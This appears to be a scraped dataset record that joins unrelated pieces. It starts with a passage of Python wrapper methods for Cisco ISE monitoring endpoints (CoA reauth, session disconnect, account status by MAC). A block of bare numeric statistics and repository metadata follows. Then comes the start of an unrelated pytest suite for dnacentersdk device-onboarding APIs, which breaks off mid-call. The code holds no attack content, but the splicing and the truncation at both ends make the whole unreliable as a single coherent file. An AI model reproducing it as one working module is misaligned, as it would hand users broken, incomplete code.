        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the Identity Services Engine cloud returns an error.
    """
    check_type(headers, dict)
    if headers is not None and 'Accept' in headers:
        check_type(headers.get('Accept'), basestring, may_be_none=False)

    request_headers = self._session.headers or {}
    use_custom_headers = bool(headers)
    if headers:
        request_headers.update(dict_of_str(headers))

    # Path parameters are mandatory; validation order kept from the original.
    check_type(psn_nam_e, basestring, may_be_none=False)
    check_type(end_poi_ntm_ac, basestring, may_be_none=False)
    check_type(rea_uth_typ_e, basestring, may_be_none=False)

    request_params = dict_from_items_with_values(dict(query_parameters))
    path_params = {
        'PSN_NAME': psn_nam_e,
        'ENDPOINT_MAC': end_poi_ntm_ac,
        'REAUTH_TYPE': rea_uth_typ_e,
    }
    endpoint_full_url = apply_path_params(
        '/admin/API/mnt/CoA/Reauth/{PSN_NAME}/{ENDPOINT_MAC}/{REAUTH_TYPE}',
        path_params)
    if use_custom_headers:
        raw_response = self._session.get(endpoint_full_url,
                                         params=request_params,
                                         headers=request_headers)
    else:
        raw_response = self._session.get(endpoint_full_url,
                                         params=request_params)
    return self._object_factory('bpm_f73477346fb5e7097d915c7f0a99659_v3_1_1', raw_response)
def session_disconnect(self,
                       dis_con_nec_tty_pe,
                       end_poi_nti_p,
                       mac,
                       nas_ipv4,
                       psn_nam_e,
                       headers=None,
                       **query_parameters):
    """Issue a CoA Session Disconnect for a session.

    Args:
        end_poi_nti_p(basestring): ENDPOINT_IP path parameter.
        psn_nam_e(basestring): PSN_NAME path parameter.
        mac(basestring): MAC path parameter.
        dis_con_nec_tty_pe(basestring): DISCONNECT_TYPE path parameter.
        nas_ipv4(basestring): NAS_IPV4 path parameter.
        headers(dict): Dictionary of HTTP headers to send with the request.
        **query_parameters: Additional query parameters (provides support
            for parameters that may be added in the future).

    Returns:
        RestResponse: REST response with following properties:
            - headers(MyDict): response headers.
            - response(MyDict): response body as a MyDict object.
            - content(bytes): representation of the request's response.
            - text(str): representation of the request's response.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the Identity Services Engine cloud returns an error.
    """
    check_type(headers, dict)
    if headers is not None:
        if 'Accept' in headers:
            check_type(headers.get('Accept'),
                       basestring, may_be_none=False)
    with_custom_headers = False
    _headers = self._session.headers or {}
    if headers:
        _headers.update(dict_of_str(headers))
        with_custom_headers = True
    check_type(end_poi_nti_p, basestring,
               may_be_none=False)
    check_type(psn_nam_e, basestring,
               may_be_none=False)
    check_type(mac, basestring,
               may_be_none=False)
    check_type(dis_con_nec_tty_pe, basestring,
               may_be_none=False)
    check_type(nas_ipv4, basestring,
               may_be_none=False)
    _params = {
    }
    _params.update(query_parameters)
    _params = dict_from_items_with_values(_params)
    path_params = {
        'ENDPOINT_IP': end_poi_nti_p,
        'PSN_NAME': psn_nam_e,
        'MAC': mac,
        'DISCONNECT_TYPE': dis_con_nec_tty_pe,
        'NAS_IPV4': nas_ipv4,
    }
    # BUGFIX: the original template was
    # '/admin/API/mnt/CoA/Disconnect>/.../{{ENDPOINT_IP}}' — the stray '>'
    # produced an invalid URL segment, and the doubled braces escaped
    # '{ENDPOINT_IP}' so the ENDPOINT_IP entry in path_params was never
    # substituted (the literal placeholder was sent instead).
    e_url = ('/admin/API/mnt/CoA/Disconnect/{PSN_NAME}/{MAC}/{DISCONN'
             + 'ECT_TYPE}/{NAS_IPV4}/{ENDPOINT_IP}')
    endpoint_full_url = apply_path_params(e_url, path_params)
    if with_custom_headers:
        _api_response = self._session.get(endpoint_full_url, params=_params,
                                          headers=_headers)
    else:
        _api_response = self._session.get(endpoint_full_url, params=_params)
    return self._object_factory('bpm_a097870d5734861255a347911a24_v3_1_1', _api_response)
def get_account_status_by_mac(self,
                              duration,
                              mac,
                              headers=None,
                              **query_parameters):
    """Fetch AccountStatus records for a MAC address over a duration.

    Args:
        mac(basestring): mac path parameter.
        duration(basestring): duration path parameter.
        headers(dict): Dictionary of HTTP headers to send with the request.
        **query_parameters: Additional query parameters (provides support
            for parameters that may be added in the future).

    Returns:
        RestResponse: REST response with following properties:
            - headers(MyDict): response headers.
            - response(MyDict): response body as a MyDict object.
            - content(bytes): representation of the request's response.
            - text(str): representation of the request's response.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the Identity Services Engine cloud returns an error.
    """
    check_type(headers, dict)
    if headers is not None and 'Accept' in headers:
        check_type(headers.get('Accept'), basestring, may_be_none=False)

    request_headers = self._session.headers or {}
    use_custom_headers = bool(headers)
    if headers:
        request_headers.update(dict_of_str(headers))

    # Path parameters are mandatory; validation order kept from the original.
    check_type(mac, basestring, may_be_none=False)
    check_type(duration, basestring, may_be_none=False)

    request_params = dict_from_items_with_values(dict(query_parameters))
    path_params = {
        'mac': mac,
        'duration': duration,
    }
    endpoint_full_url = apply_path_params(
        '/admin/API/mnt/AcctStatus/MACAddress/{mac}/{duration}',
        path_params)
    if use_custom_headers:
        raw_response = self._session.get(endpoint_full_url,
                                         params=request_params,
                                         headers=request_headers)
    else:
        raw_response = self._session.get(endpoint_full_url,
                                         params=request_params)
    return self._object_factory('bpm_ab0a3ec0359faa72142f074145f6a_v3_1_1', raw_response)
| 38.025483
| 124
| 0.592748
| 4,641
| 43,273
| 5.26783
| 0.064426
| 0.041721
| 0.035463
| 0.027201
| 0.861666
| 0.84285
| 0.821949
| 0.803747
| 0.794707
| 0.785995
| 0
| 0.014414
| 0.342662
| 43,273
| 1,137
| 125
| 38.058927
| 0.845069
| 0.379475
| 0
| 0.739677
| 0
| 0
| 0.075311
| 0.060059
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032316
| false
| 0
| 0.010772
| 0
| 0.075404
| 0.001795
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0afbf737ad3de3e6306123575d124b23084f9cc2
| 56,512
|
py
|
Python
|
tests/api/v1_3_1/test_device_onboarding_pnp.py
|
nonstdout/dnacentersdk
|
dbbbc4baa5300aa9e5c9193f2ea71438018095f5
|
[
"MIT"
] | null | null | null |
tests/api/v1_3_1/test_device_onboarding_pnp.py
|
nonstdout/dnacentersdk
|
dbbbc4baa5300aa9e5c9193f2ea71438018095f5
|
[
"MIT"
] | null | null | null |
tests/api/v1_3_1/test_device_onboarding_pnp.py
|
nonstdout/dnacentersdk
|
dbbbc4baa5300aa9e5c9193f2ea71438018095f5
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""DNACenterAPI device_onboarding_pnp API fixtures and tests.
Copyright (c) 2019-2020 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import pytest
from tests.environment import DNA_CENTER_VERSION
pytestmark = pytest.mark.skipif(DNA_CENTER_VERSION != '1.3.1', reason='version does not match')
def is_valid_get_sync_result_for_virtual_account(json_schema_validate, obj):
    """Return True when *obj* conforms to the endpoint's JSON schema."""
    schema = json_schema_validate('jsd_0a9c988445cb91c8_v1_3_1')
    schema.validate(obj)
    return True


def get_sync_result_for_virtual_account(api):
    """Call the endpoint with representative sample values."""
    return api.device_onboarding_pnp.get_sync_result_for_virtual_account(
        domain='string',
        name='string'
    )


@pytest.mark.device_onboarding_pnp
def test_get_sync_result_for_virtual_account(api, validator):
    response = get_sync_result_for_virtual_account(api)
    assert is_valid_get_sync_result_for_virtual_account(validator, response)


def get_sync_result_for_virtual_account_default(api):
    """Call the endpoint with its default argument set."""
    return api.device_onboarding_pnp.get_sync_result_for_virtual_account(
        domain='string',
        name='string'
    )


@pytest.mark.device_onboarding_pnp
def test_get_sync_result_for_virtual_account_default(api, validator):
    # A TypeError mentioning a missing (None) argument is the accepted outcome.
    try:
        response = get_sync_result_for_virtual_account_default(api)
        assert is_valid_get_sync_result_for_virtual_account(validator, response)
    except Exception as original_e:
        with pytest.raises(TypeError, match="but instead we received None"):
            raise original_e
def is_valid_un_claim_device(json_schema_validate, obj):
    """Return True when *obj* conforms to the endpoint's JSON schema."""
    schema = json_schema_validate('jsd_0b836b7b4b6a9fd5_v1_3_1')
    schema.validate(obj)
    return True


def un_claim_device(api):
    """Call the endpoint with representative sample values."""
    return api.device_onboarding_pnp.un_claim_device(
        active_validation=True,
        deviceIdList=['string'],
        payload=None
    )


@pytest.mark.device_onboarding_pnp
def test_un_claim_device(api, validator):
    response = un_claim_device(api)
    assert is_valid_un_claim_device(validator, response)


def un_claim_device_default(api):
    """Call the endpoint with its default (None) argument set."""
    return api.device_onboarding_pnp.un_claim_device(
        active_validation=True,
        deviceIdList=None,
        payload=None
    )


@pytest.mark.device_onboarding_pnp
def test_un_claim_device_default(api, validator):
    # A TypeError mentioning a missing (None) argument is the accepted outcome.
    try:
        response = un_claim_device_default(api)
        assert is_valid_un_claim_device(validator, response)
    except Exception as original_e:
        with pytest.raises(TypeError, match="but instead we received None"):
            raise original_e
def is_valid_update_device(json_schema_validate, obj):
    """Return True when *obj* conforms to the endpoint's JSON schema."""
    schema = json_schema_validate('jsd_09b0f9ce4239ae10_v1_3_1')
    schema.validate(obj)
    return True


def update_device(api):
    """Call the endpoint with a fully populated sample payload."""
    return api.device_onboarding_pnp.update_device(
        _id='string',
        active_validation=True,
        deviceInfo={'aaaCredentials': {'password': 'string', 'username': 'string'}, 'addedOn': 0, 'addnMacAddrs': ['string'], 'agentType': 'POSIX', 'authStatus': 'string', 'authenticatedSudiSerialNo': 'string', 'capabilitiesSupported': ['string'], 'cmState': 'NotContacted', 'description': 'string', 'deviceSudiSerialNos': ['string'], 'deviceType': 'string', 'featuresSupported': ['string'], 'fileSystemList': [{'freespace': 0, 'name': 'string', 'readable': True, 'size': 0, 'type': 'string', 'writeable': True}], 'firstContact': 0, 'hostname': 'string', 'httpHeaders': [{'key': 'string', 'value': 'string'}], 'imageFile': 'string', 'imageVersion': 'string', 'ipInterfaces': [{'ipv4Address': {}, 'ipv6AddressList': [{}], 'macAddress': 'string', 'name': 'string', 'status': 'string'}], 'lastContact': 0, 'lastSyncTime': 0, 'lastUpdateOn': 0, 'location': {'address': 'string', 'altitude': 'string', 'latitude': 'string', 'longitude': 'string', 'siteId': 'string'}, 'macAddress': 'string', 'mode': 'string', 'name': 'string', 'neighborLinks': [{'localInterfaceName': 'string', 'localMacAddress': 'string', 'localShortInterfaceName': 'string', 'remoteDeviceName': 'string', 'remoteInterfaceName': 'string', 'remoteMacAddress': 'string', 'remotePlatform': 'string', 'remoteShortInterfaceName': 'string', 'remoteVersion': 'string'}], 'onbState': 'NotContacted', 'pid': 'string', 'pnpProfileList': [{'createdBy': 'string', 'discoveryCreated': True, 'primaryEndpoint': {'certificate': 'string', 'fqdn': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'port': 0, 'protocol': 'string'}, 'profileName': 'string', 'secondaryEndpoint': {'certificate': 'string', 'fqdn': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'port': 0, 'protocol': 'string'}}], 'populateInventory': True, 'preWorkflowCliOuputs': [{'cli': 'string', 'cliOutput': 'string'}], 'projectId': 'string', 'projectName': 'string', 'reloadRequested': True, 'serialNumber': 'string', 'smartAccountId': 'string', 'source': 'string', 'stack': True, 'stackInfo': {'isFullRing': True, 'stackMemberList': [{'hardwareVersion': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'macAddress': 'string', 'pid': 'string', 'priority': 0, 'role': 'string', 'serialNumber': 'string', 'softwareVersion': 'string', 'stackNumber': 0, 'state': 'string', 'sudiSerialNumber': 'string'}], 'stackRingProtocol': 'string', 'supportsStackWorkflows': True, 'totalMemberCount': 0, 'validLicenseLevels': ['string']}, 'state': 'Unclaimed', 'sudiRequired': True, 'tags': {}, 'userSudiSerialNos': ['string'], 'virtualAccountId': 'string', 'workflowId': 'string', 'workflowName': 'string'},
        id='string',
        payload=None,
        runSummaryList=[{'details': 'string', 'errorFlag': True, 'historyTaskInfo': {'addnDetails': [{'key': 'string', 'value': 'string'}], 'name': 'string', 'timeTaken': 0, 'type': 'string', 'workItemList': [{'command': 'string', 'endTime': 0, 'outputStr': 'string', 'startTime': 0, 'state': 'string', 'timeTaken': 0}]}, 'timestamp': 0}],
        systemResetWorkflow={'_id': 'string', 'addToInventory': True, 'addedOn': 0, 'configId': 'string', 'currTaskIdx': 0, 'description': 'string', 'endTime': 0, 'execTime': 0, 'imageId': 'string', 'instanceType': 'SystemWorkflow', 'lastupdateOn': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'tasks': [{'currWorkItemIdx': 0, 'endTime': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'taskSeqNo': 0, 'timeTaken': 0, 'type': 'string', 'workItemList': [{'command': 'string', 'endTime': 0, 'outputStr': 'string', 'startTime': 0, 'state': 'string', 'timeTaken': 0}]}], 'tenantId': 'string', 'type': 'string', 'useState': 'string', 'version': 0},
        systemWorkflow={'_id': 'string', 'addToInventory': True, 'addedOn': 0, 'configId': 'string', 'currTaskIdx': 0, 'description': 'string', 'endTime': 0, 'execTime': 0, 'imageId': 'string', 'instanceType': 'SystemWorkflow', 'lastupdateOn': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'tasks': [{'currWorkItemIdx': 0, 'endTime': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'taskSeqNo': 0, 'timeTaken': 0, 'type': 'string', 'workItemList': [{'command': 'string', 'endTime': 0, 'outputStr': 'string', 'startTime': 0, 'state': 'string', 'timeTaken': 0}]}], 'tenantId': 'string', 'type': 'string', 'useState': 'string', 'version': 0},
        tenantId='string',
        version=0,
        workflow={'_id': 'string', 'addToInventory': True, 'addedOn': 0, 'configId': 'string', 'currTaskIdx': 0, 'description': 'string', 'endTime': 0, 'execTime': 0, 'imageId': 'string', 'instanceType': 'SystemWorkflow', 'lastupdateOn': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'tasks': [{'currWorkItemIdx': 0, 'endTime': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'taskSeqNo': 0, 'timeTaken': 0, 'type': 'string', 'workItemList': [{'command': 'string', 'endTime': 0, 'outputStr': 'string', 'startTime': 0, 'state': 'string', 'timeTaken': 0}]}], 'tenantId': 'string', 'type': 'string', 'useState': 'string', 'version': 0},
        workflowParameters={'configList': [{'configId': 'string', 'configParameters': [{'key': 'string', 'value': 'string'}]}], 'licenseLevel': 'string', 'licenseType': 'string', 'topOfStackSerialNumber': 'string'}
    )


@pytest.mark.device_onboarding_pnp
def test_update_device(api, validator):
    response = update_device(api)
    assert is_valid_update_device(validator, response)


def update_device_default(api):
    """Call the endpoint with its default (None) argument set."""
    return api.device_onboarding_pnp.update_device(
        _id=None,
        active_validation=True,
        deviceInfo=None,
        id='string',
        payload=None,
        runSummaryList=None,
        systemResetWorkflow=None,
        systemWorkflow=None,
        tenantId=None,
        version=None,
        workflow=None,
        workflowParameters=None
    )


@pytest.mark.device_onboarding_pnp
def test_update_device_default(api, validator):
    # A TypeError mentioning a missing (None) argument is the accepted outcome.
    try:
        response = update_device_default(api)
        assert is_valid_update_device(validator, response)
    except Exception as original_e:
        with pytest.raises(TypeError, match="but instead we received None"):
            raise original_e
def is_valid_add_virtual_account(json_schema_validate, obj):
    """Return True when *obj* conforms to the endpoint's JSON schema."""
    schema = json_schema_validate('jsd_1e962af345b8b59f_v1_3_1')
    schema.validate(obj)
    return True


def add_virtual_account(api):
    """Call the endpoint with a fully populated sample payload."""
    return api.device_onboarding_pnp.add_virtual_account(
        active_validation=True,
        autoSyncPeriod=0,
        ccoUser='string',
        expiry=0,
        lastSync=0,
        payload=None,
        profile={'addressFqdn': 'string', 'addressIpV4': 'string', 'cert': 'string', 'makeDefault': True, 'name': 'string', 'port': 0, 'profileId': 'string', 'proxy': True},
        smartAccountId='string',
        syncResult={'syncList': [{'deviceSnList': ['string'], 'syncType': 'Add'}], 'syncMsg': 'string'},
        syncResultStr='string',
        syncStartTime=0,
        syncStatus='NOT_SYNCED',
        tenantId='string',
        token='string',
        virtualAccountId='string'
    )


@pytest.mark.device_onboarding_pnp
def test_add_virtual_account(api, validator):
    response = add_virtual_account(api)
    assert is_valid_add_virtual_account(validator, response)


def add_virtual_account_default(api):
    """Call the endpoint with its default (None) argument set."""
    return api.device_onboarding_pnp.add_virtual_account(
        active_validation=True,
        autoSyncPeriod=None,
        ccoUser=None,
        expiry=None,
        lastSync=None,
        payload=None,
        profile=None,
        smartAccountId=None,
        syncResult=None,
        syncResultStr=None,
        syncStartTime=None,
        syncStatus=None,
        tenantId=None,
        token=None,
        virtualAccountId=None
    )


@pytest.mark.device_onboarding_pnp
def test_add_virtual_account_default(api, validator):
    # A TypeError mentioning a missing (None) argument is the accepted outcome.
    try:
        response = add_virtual_account_default(api)
        assert is_valid_add_virtual_account(validator, response)
    except Exception as original_e:
        with pytest.raises(TypeError, match="but instead we received None"):
            raise original_e
def is_valid_deregister_virtual_account(json_schema_validate, obj):
    """Return True when *obj* conforms to the endpoint's JSON schema."""
    schema = json_schema_validate('jsd_2499e9ad42e8ae5b_v1_3_1')
    schema.validate(obj)
    return True


def deregister_virtual_account(api):
    """Call the endpoint with representative sample values."""
    return api.device_onboarding_pnp.deregister_virtual_account(
        domain='string',
        name='string'
    )


@pytest.mark.device_onboarding_pnp
def test_deregister_virtual_account(api, validator):
    response = deregister_virtual_account(api)
    assert is_valid_deregister_virtual_account(validator, response)


def deregister_virtual_account_default(api):
    """Call the endpoint with its default (None) argument set."""
    return api.device_onboarding_pnp.deregister_virtual_account(
        domain=None,
        name=None
    )


@pytest.mark.device_onboarding_pnp
def test_deregister_virtual_account_default(api, validator):
    # A TypeError mentioning a missing (None) argument is the accepted outcome.
    try:
        response = deregister_virtual_account_default(api)
        assert is_valid_deregister_virtual_account(validator, response)
    except Exception as original_e:
        with pytest.raises(TypeError, match="but instead we received None"):
            raise original_e
def is_valid_get_smart_account_list(json_schema_validate, obj):
    """Return True when *obj* conforms to the endpoint's JSON schema."""
    schema = json_schema_validate('jsd_3cb24acb486b89d2_v1_3_1')
    schema.validate(obj)
    return True


def get_smart_account_list(api):
    """Call the parameterless endpoint."""
    return api.device_onboarding_pnp.get_smart_account_list(
    )


@pytest.mark.device_onboarding_pnp
def test_get_smart_account_list(api, validator):
    response = get_smart_account_list(api)
    assert is_valid_get_smart_account_list(validator, response)


def get_smart_account_list_default(api):
    """Call the parameterless endpoint (default variant)."""
    return api.device_onboarding_pnp.get_smart_account_list(
    )


@pytest.mark.device_onboarding_pnp
def test_get_smart_account_list_default(api, validator):
    # A TypeError mentioning a missing (None) argument is the accepted outcome.
    try:
        response = get_smart_account_list_default(api)
        assert is_valid_get_smart_account_list(validator, response)
    except Exception as original_e:
        with pytest.raises(TypeError, match="but instead we received None"):
            raise original_e
def is_valid_claim_a_device_to_a_site(json_schema_validate, obj):
    """Truthiness check only; no JSON schema is available for this endpoint."""
    return bool(obj)


def claim_a_device_to_a_site(api):
    """Call the endpoint with representative sample values."""
    return api.device_onboarding_pnp.claim_a_device_to_a_site(
        active_validation=True,
        deviceId='string',
        payload=None,
        siteId='string',
        type='Default'
    )


@pytest.mark.device_onboarding_pnp
def test_claim_a_device_to_a_site(api, validator):
    response = claim_a_device_to_a_site(api)
    assert is_valid_claim_a_device_to_a_site(validator, response)


def claim_a_device_to_a_site_default(api):
    """Call the endpoint with its default (None) argument set."""
    return api.device_onboarding_pnp.claim_a_device_to_a_site(
        active_validation=True,
        deviceId=None,
        payload=None,
        siteId=None,
        type=None
    )


@pytest.mark.device_onboarding_pnp
def test_claim_a_device_to_a_site_default(api, validator):
    # A TypeError mentioning a missing (None) argument is the accepted outcome.
    try:
        response = claim_a_device_to_a_site_default(api)
        assert is_valid_claim_a_device_to_a_site(validator, response)
    except Exception as original_e:
        with pytest.raises(TypeError, match="but instead we received None"):
            raise original_e
def is_valid_update_pnp_server_profile(json_schema_validate, obj):
    """Return True when *obj* conforms to the endpoint's JSON schema."""
    schema = json_schema_validate('jsd_6f9819e84178870c_v1_3_1')
    schema.validate(obj)
    return True


def update_pnp_server_profile(api):
    """Call the endpoint with a fully populated sample payload."""
    return api.device_onboarding_pnp.update_pnp_server_profile(
        active_validation=True,
        autoSyncPeriod=0,
        ccoUser='string',
        expiry=0,
        lastSync=0,
        payload=None,
        profile={'addressFqdn': 'string', 'addressIpV4': 'string', 'cert': 'string', 'makeDefault': True, 'name': 'string', 'port': 0, 'profileId': 'string', 'proxy': True},
        smartAccountId='string',
        syncResult={'syncList': [{'deviceSnList': ['string'], 'syncType': 'Add'}], 'syncMsg': 'string'},
        syncResultStr='string',
        syncStartTime=0,
        syncStatus='NOT_SYNCED',
        tenantId='string',
        token='string',
        virtualAccountId='string'
    )


@pytest.mark.device_onboarding_pnp
def test_update_pnp_server_profile(api, validator):
    response = update_pnp_server_profile(api)
    assert is_valid_update_pnp_server_profile(validator, response)


def update_pnp_server_profile_default(api):
    """Call the endpoint with its default (None) argument set."""
    return api.device_onboarding_pnp.update_pnp_server_profile(
        active_validation=True,
        autoSyncPeriod=None,
        ccoUser=None,
        expiry=None,
        lastSync=None,
        payload=None,
        profile=None,
        smartAccountId=None,
        syncResult=None,
        syncResultStr=None,
        syncStartTime=None,
        syncStatus=None,
        tenantId=None,
        token=None,
        virtualAccountId=None
    )


@pytest.mark.device_onboarding_pnp
def test_update_pnp_server_profile_default(api, validator):
    # A TypeError mentioning a missing (None) argument is the accepted outcome.
    try:
        response = update_pnp_server_profile_default(api)
        assert is_valid_update_pnp_server_profile(validator, response)
    except Exception as original_e:
        with pytest.raises(TypeError, match="but instead we received None"):
            raise original_e
def is_valid_get_workflow_count(json_schema_validate, obj):
    """Return True when *obj* conforms to the endpoint's JSON schema."""
    schema = json_schema_validate('jsd_7989f86846faaf99_v1_3_1')
    schema.validate(obj)
    return True


def get_workflow_count(api):
    """Call the endpoint with representative sample values."""
    return api.device_onboarding_pnp.get_workflow_count(
        name='value1,value2'
    )


@pytest.mark.device_onboarding_pnp
def test_get_workflow_count(api, validator):
    response = get_workflow_count(api)
    assert is_valid_get_workflow_count(validator, response)


def get_workflow_count_default(api):
    """Call the endpoint with its default (None) argument set."""
    return api.device_onboarding_pnp.get_workflow_count(
        name=None
    )


@pytest.mark.device_onboarding_pnp
def test_get_workflow_count_default(api, validator):
    # A TypeError mentioning a missing (None) argument is the accepted outcome.
    try:
        response = get_workflow_count_default(api)
        assert is_valid_get_workflow_count(validator, response)
    except Exception as original_e:
        with pytest.raises(TypeError, match="but instead we received None"):
            raise original_e
def is_valid_get_workflow_by_id(json_schema_validate, obj):
    """Return True when *obj* conforms to the endpoint's JSON schema."""
    schema = json_schema_validate('jsd_80acb88e4ac9ac6d_v1_3_1')
    schema.validate(obj)
    return True


def get_workflow_by_id(api):
    """Call the endpoint with representative sample values."""
    return api.device_onboarding_pnp.get_workflow_by_id(
        id='string'
    )


@pytest.mark.device_onboarding_pnp
def test_get_workflow_by_id(api, validator):
    response = get_workflow_by_id(api)
    assert is_valid_get_workflow_by_id(validator, response)


def get_workflow_by_id_default(api):
    """Call the endpoint with its default argument set."""
    return api.device_onboarding_pnp.get_workflow_by_id(
        id='string'
    )


@pytest.mark.device_onboarding_pnp
def test_get_workflow_by_id_default(api, validator):
    # A TypeError mentioning a missing (None) argument is the accepted outcome.
    try:
        response = get_workflow_by_id_default(api)
        assert is_valid_get_workflow_by_id(validator, response)
    except Exception as original_e:
        with pytest.raises(TypeError, match="but instead we received None"):
            raise original_e
def is_valid_get_virtual_account_list(json_schema_validate, obj):
    """Return True when *obj* conforms to the endpoint's JSON schema."""
    schema = json_schema_validate('jsd_70a479a6462a9496_v1_3_1')
    schema.validate(obj)
    return True


def get_virtual_account_list(api):
    """Call the endpoint with representative sample values."""
    return api.device_onboarding_pnp.get_virtual_account_list(
        domain='string'
    )


@pytest.mark.device_onboarding_pnp
def test_get_virtual_account_list(api, validator):
    response = get_virtual_account_list(api)
    assert is_valid_get_virtual_account_list(validator, response)


def get_virtual_account_list_default(api):
    """Call the endpoint with its default argument set."""
    return api.device_onboarding_pnp.get_virtual_account_list(
        domain='string'
    )


@pytest.mark.device_onboarding_pnp
def test_get_virtual_account_list_default(api, validator):
    # A TypeError mentioning a missing (None) argument is the accepted outcome.
    try:
        response = get_virtual_account_list_default(api)
        assert is_valid_get_virtual_account_list(validator, response)
    except Exception as original_e:
        with pytest.raises(TypeError, match="but instead we received None"):
            raise original_e
def is_valid_add_a_workflow(json_schema_validate, obj):
    """Return True when *obj* conforms to the endpoint's JSON schema."""
    schema = json_schema_validate('jsd_848b5a7b4f9b8c12_v1_3_1')
    schema.validate(obj)
    return True


def add_a_workflow(api):
    """Call the endpoint with a fully populated sample payload."""
    return api.device_onboarding_pnp.add_a_workflow(
        _id='string',
        active_validation=True,
        addToInventory=True,
        addedOn=0,
        configId='string',
        currTaskIdx=0,
        description='string',
        endTime=0,
        execTime=0,
        imageId='string',
        instanceType='SystemWorkflow',
        lastupdateOn=0,
        name='string',
        payload=None,
        startTime=0,
        state='string',
        tasks=[{'currWorkItemIdx': 0, 'endTime': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'taskSeqNo': 0, 'timeTaken': 0, 'type': 'string', 'workItemList': [{'command': 'string', 'endTime': 0, 'outputStr': 'string', 'startTime': 0, 'state': 'string', 'timeTaken': 0}]}],
        tenantId='string',
        type='string',
        useState='string',
        version=0
    )


@pytest.mark.device_onboarding_pnp
def test_add_a_workflow(api, validator):
    response = add_a_workflow(api)
    assert is_valid_add_a_workflow(validator, response)


def add_a_workflow_default(api):
    """Call the endpoint with its default (None) argument set."""
    return api.device_onboarding_pnp.add_a_workflow(
        _id=None,
        active_validation=True,
        addToInventory=None,
        addedOn=None,
        configId=None,
        currTaskIdx=None,
        description=None,
        endTime=None,
        execTime=None,
        imageId=None,
        instanceType=None,
        lastupdateOn=None,
        name=None,
        payload=None,
        startTime=None,
        state=None,
        tasks=None,
        tenantId=None,
        type=None,
        useState=None,
        version=None
    )


@pytest.mark.device_onboarding_pnp
def test_add_a_workflow_default(api, validator):
    # A TypeError mentioning a missing (None) argument is the accepted outcome.
    try:
        response = add_a_workflow_default(api)
        assert is_valid_add_a_workflow(validator, response)
    except Exception as original_e:
        with pytest.raises(TypeError, match="but instead we received None"):
            raise original_e
def is_valid_sync_virtual_account_devices(json_schema_validate, obj):
    """Return True when *obj* conforms to the endpoint's JSON schema."""
    schema = json_schema_validate('jsd_a4b6c87a4ffb9efa_v1_3_1')
    schema.validate(obj)
    return True


def sync_virtual_account_devices(api):
    """Call the endpoint with a fully populated sample payload."""
    return api.device_onboarding_pnp.sync_virtual_account_devices(
        active_validation=True,
        autoSyncPeriod=0,
        ccoUser='string',
        expiry=0,
        lastSync=0,
        payload=None,
        profile={'addressFqdn': 'string', 'addressIpV4': 'string', 'cert': 'string', 'makeDefault': True, 'name': 'string', 'port': 0, 'profileId': 'string', 'proxy': True},
        smartAccountId='string',
        syncResult={'syncList': [{'deviceSnList': ['string'], 'syncType': 'Add'}], 'syncMsg': 'string'},
        syncResultStr='string',
        syncStartTime=0,
        syncStatus='NOT_SYNCED',
        tenantId='string',
        token='string',
        virtualAccountId='string'
    )


@pytest.mark.device_onboarding_pnp
def test_sync_virtual_account_devices(api, validator):
    response = sync_virtual_account_devices(api)
    assert is_valid_sync_virtual_account_devices(validator, response)


def sync_virtual_account_devices_default(api):
    """Call the endpoint with its default (None) argument set."""
    return api.device_onboarding_pnp.sync_virtual_account_devices(
        active_validation=True,
        autoSyncPeriod=None,
        ccoUser=None,
        expiry=None,
        lastSync=None,
        payload=None,
        profile=None,
        smartAccountId=None,
        syncResult=None,
        syncResultStr=None,
        syncStartTime=None,
        syncStatus=None,
        tenantId=None,
        token=None,
        virtualAccountId=None
    )


@pytest.mark.device_onboarding_pnp
def test_sync_virtual_account_devices_default(api, validator):
    # A TypeError mentioning a missing (None) argument is the accepted outcome.
    try:
        response = sync_virtual_account_devices_default(api)
        assert is_valid_sync_virtual_account_devices(validator, response)
    except Exception as original_e:
        with pytest.raises(TypeError, match="but instead we received None"):
            raise original_e
def is_valid_reset_device(json_schema_validate, obj):
    """Return True when *obj* conforms to the endpoint's JSON schema."""
    schema = json_schema_validate('jsd_9e857b5a4a0bbcdb_v1_3_1')
    schema.validate(obj)
    return True


def reset_device(api):
    """Call the endpoint with a fully populated sample payload."""
    return api.device_onboarding_pnp.reset_device(
        active_validation=True,
